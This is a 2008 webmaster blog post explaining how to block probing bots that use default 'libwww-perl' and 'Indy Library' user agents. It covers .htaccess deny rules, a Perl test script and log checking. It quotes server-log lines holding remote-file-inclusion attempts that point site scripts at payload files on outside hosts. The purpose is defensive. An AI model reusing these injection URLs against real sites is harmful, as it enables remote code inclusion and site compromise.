Here are some sample lines from our server logs ... and I don't like the look of them!
from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24
from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17
Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (also known as the "User Agent") - are very likely to be attempts to find a security hole in our site scripts. Through such a hole, an attacker can copy their program onto our server and go on to infect other systems, or use our site to advertise their own by injecting their URLs. So what are "Indy Library" and "libwww-perl"?
Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...
libwww-perl is the default User Agent string of LWP (the Library for WWW in Perl), so in this case it's probable that someone has written an automated program in Perl ...
Automated programs are a necessity - and indeed we welcome well behaved crawlers, from the well known Google and Yahoo through to more obscure ones too. But authors of such crawlers who know what they're doing change the User Agent string rather than using the default. In my experience, we really don't want visitors using the default string on our site: at least 90% are malicious, and the remaining 10% are amateur. So how can we turn them off?
Standard practice is to deny specific user agents via the robots.txt file - but chances are that the naughty bots won't respect that, so we need to enforce the rule!
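For comparison, the polite request in robots.txt might look like the sketch below. It is an illustration rather than something taken from our live site, and it assumes that a crawler matches these tokens against its own User Agent string, which badly behaved bots are unlikely to bother doing.

```text
# Hypothetical robots.txt entries - advisory only, nothing here is enforced
User-agent: libwww-perl
Disallow: /

User-agent: Indy Library
Disallow: /
```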
Here are three lines that I've added to our .htaccess file ...
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys
These will send out a 403 Forbidden message to the automata, telling them that they can't have the page they seek. Goodness knows what the receiving bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.
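As a sketch of what a lightweight 403 'handler' could look like, the fragment below returns a short inline message rather than a full error page. The message text is an assumption, not what our server actually sends. The second part is an assumed equivalent of the Deny line for Apache 2.4 and later, where Deny is only available through mod_access_compat.

```apache
# Assumption: a one-line text body is all a blocked bot needs to receive
ErrorDocument 403 "Forbidden"

# Assumption: Apache 2.4+ style access control, replacing "Deny from env=naughty_boys"
<RequireAll>
    Require all granted
    Require not env naughty_boys
</RequireAll>
```

Using ErrorDocument in .htaccess relies on the server allowing the FileInfo override; the Require lines rely on AuthConfig.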
How do we test that?
Here's a simple Perl script that will declare itself as being libwww:
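#!/usr/bin/perl
# Fetch a page using LWP's default User Agent string ("libwww-perl/...")
use LWP::UserAgent;
use HTTP::Request;
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
my $res = $ua->request($req);
if ($res->is_success) {
    print $res->content;
} else {
    # A blocked request reports its status line here
    print "Error: " . $res->status_line . "\n";
}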
And when I run that, it now gives me:
-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$
If I add the line:
$ua->agent("Well House Consultants Bot");
into that program, I get a much more satisfying result back ...
-bash-3.2$ perl pg2
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on
Links - full source code of our test program without and with our own user agent being set.
One of the matters that I considered very carefully indeed before blocking these user agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater, if you like. Not the case, I believe - most people who have legit babies take good care of them and name them properly - but I will be watching my log files nonetheless to check.
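One way to keep that watch is to tally the 403 responses by User Agent. The script below is a minimal sketch, not the tool we actually run: it assumes the Apache "combined" log format, and the sample lines, addresses and the `blocked_by_agent` name are all made up for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical sample records in Apache "combined" log format.
# In practice these lines would be read from the real access log.
my @sample = (
    '192.0.2.10 - - [12/Sep/2008:21:28:20 +0100] "GET /index.html?x=1 HTTP/1.1" 403 - "-" "libwww-perl/5.805"',
    '192.0.2.11 - - [12/Sep/2008:21:29:02 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Well House Consultants Bot"',
    '192.0.2.12 - - [12/Sep/2008:21:30:45 +0100] "GET /smap.php HTTP/1.1" 403 - "-" "Mozilla/3.0 (compatible; Indy Library)"',
);

# Count the requests that were answered with 403, keyed by User Agent.
sub blocked_by_agent {
    my @lines = @_;
    my %count;
    for my $line (@lines) {
        # Fields: host ident user [time] "request" status bytes "referer" "agent"
        next unless $line =~ /^\S+ \S+ \S+ \[[^\]]+\] "[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;
        my ($status, $agent) = ($1, $2);
        $count{$agent}++ if $status == 403;
    }
    return %count;
}

# Print one line per blocked User Agent: count, tab, agent string.
my %blocked = blocked_by_agent(@sample);
for my $agent (sort keys %blocked) {
    print "$blocked{$agent}\t$agent\n";
}
```

Any agent string in that report that doesn't look like a default library name would be worth a closer look, as it may be one of the "babies" we didn't mean to throw out.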
As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty- programs-looking-for-security-holes-on-your- server-.html/errors.php?error= http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes, and is firmly being denied access.
(written 2008-09-13 08:28:48)